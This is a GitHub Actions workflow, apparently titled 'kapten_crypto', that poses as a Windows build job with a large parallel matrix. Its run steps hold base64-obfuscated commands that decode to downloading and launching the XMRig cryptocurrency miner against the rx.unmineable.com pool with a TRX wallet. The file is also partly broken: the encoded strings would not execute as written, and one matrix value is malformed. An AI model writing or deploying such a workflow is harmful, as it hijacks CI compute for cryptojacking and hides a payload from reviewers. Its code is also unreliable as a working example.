name: kapten_crypto
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: kapten_crypto
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,305]
        flag: [A, B, C, D, E, F, G, H, I,J,K,L,M,N,O,P]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest aHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjE1LjEveG1yaWctNi4xNS4xLW1zdmMtd2luNjQuemlwIC1PdXRGaWxlIHhtcmlnLTYuMTUuMS1tc3ZjLXdpbjY0LnppcA==
    - name: Extract
      run: Expand-Archive eG1yaWctNi4xNS4xLW1zdmMtd2luNjQuemlw
    - name: Running
      run: Llx4bXJpZy02LjE1LjEtbXN2Yy13aW42NFx4bXJpZy02LjE1LjFceG1yaWcuZXhlIC1vICByeC51bm1pbmVhYmxlLmNvbTozMzMzIC1hIHJ4IC1rIC11IFRSWDpUS1I0bjlGNzhCcDNOZHZoWkEzWE55bVRwQktZS2I1aHd1LlRSVVNUICAtcCB4IC10IDE=
    - name: END
      run: exit
